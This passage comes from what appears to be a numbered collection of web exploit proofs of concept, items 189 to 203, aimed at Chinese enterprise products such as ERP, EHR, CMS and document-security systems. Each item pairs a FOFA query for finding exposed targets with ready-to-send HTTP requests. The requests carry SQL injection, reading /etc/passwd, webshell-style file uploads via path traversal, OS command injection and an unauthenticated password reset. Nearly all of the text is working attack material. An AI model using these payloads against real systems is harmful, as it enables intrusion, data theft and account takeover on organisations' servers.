User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF value, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/
FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"

-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--